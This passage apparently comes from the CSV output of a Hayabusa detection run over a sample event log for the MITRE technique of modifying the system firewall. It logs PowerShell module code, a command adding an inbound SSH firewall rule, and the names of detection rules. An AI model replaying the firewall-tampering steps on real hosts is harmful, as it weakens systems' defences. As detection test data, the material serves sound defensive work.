$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.531 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 
10:09:45.533 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.535 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.535 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.555 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = 
'1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' -Alias '*' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) 
if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.555 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetGPO' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Open-NetGPO { [CmdletBinding(PositionalBinding=$false)] [OutputType([System.String])] param( [Parameter(ParameterSetName='Open0', Mandatory=$true, 
Position=0)] [string] ${PolicyStore}, [Parameter(ParameterSetName='Open0')] [string] ${DomainController}, [Parameter(ParameterSetName='Open0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Open0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Open0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DomainController')) { [object]$__cmdletization_value = ${DomainController} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DomainController'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Open', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Open-NetGPO' -Alias '*' function Save-NetGPO { [CmdletBinding(PositionalBinding=$false)] param( [Parameter(ParameterSetName='Save1', Mandatory=$true, Position=0)] [string] ${GPOSession}, [Parameter(ParameterSetName='Save1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Save1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Save1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.555 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 
+2021-04-23 10:09:45.556 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.556 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Open-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.557 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Save-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.683 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value 
= $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:46.214 +00:00,srvdefender01.offsec.lan,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:46.469 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-NetFirewallRule): ""New-NetFirewallRule"" ParameterBinding(New-NetFirewallRule): name=""Name""; value=""sshd"" ParameterBinding(New-NetFirewallRule): name=""DisplayName""; value=""OpenSSH Server (sshd)"" ParameterBinding(New-NetFirewallRule): name=""Enabled""; value=""True"" ParameterBinding(New-NetFirewallRule): name=""Direction""; value=""Inbound"" ParameterBinding(New-NetFirewallRule): name=""Protocol""; value=""TCP"" ParameterBinding(New-NetFirewallRule): name=""Action""; value=""Allow"" ParameterBinding(New-NetFirewallRule): name=""LocalPort""; value=""22"" ParameterBinding(New-NetFirewallRule): name=""PolicyStore""; value="""" ParameterBinding(New-NetFirewallRule): name=""GPOSession""; value="""" ParameterBinding(New-NetFirewallRule): name=""Description""; value="""" ParameterBinding(New-NetFirewallRule): name=""Group""; value="""" 
ParameterBinding(New-NetFirewallRule): name=""LooseSourceMapping""; value=""False"" ParameterBinding(New-NetFirewallRule): name=""LocalOnlyMapping""; value=""False"" ParameterBinding(New-NetFirewallRule): name=""Owner""; value="""" ParameterBinding(New-NetFirewallRule): name=""Program""; value="""" ParameterBinding(New-NetFirewallRule): name=""Package""; value="""" ParameterBinding(New-NetFirewallRule): name=""Service""; value="""" ParameterBinding(New-NetFirewallRule): name=""LocalUser""; value="""" ParameterBinding(New-NetFirewallRule): name=""RemoteUser""; value="""" ParameterBinding(New-NetFirewallRule): name=""RemoteMachine""; value="""" ParameterBinding(New-NetFirewallRule): name=""OverrideBlockRules""; value=""False"" ParameterBinding(New-NetFirewallRule): name=""ThrottleLimit""; value=""0"" ParameterBinding(New-NetFirewallRule): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:46.471 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallRule (CreationClassName = ""MSFT?FW?FirewallRule?sshd"", PolicyRuleName = """", SystemCreationClassName = """", SystemName = """")""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:46.472 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock 
Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:46.475 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:10:03.015 +00:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x3cc | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:10:03.015 +00:00,srvdefender01.offsec.lan,4688,medium,Exec,Cscript Visual Basic Script Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_cscript_vbs.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:10:03.058 +00:00,srvdefender01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or 
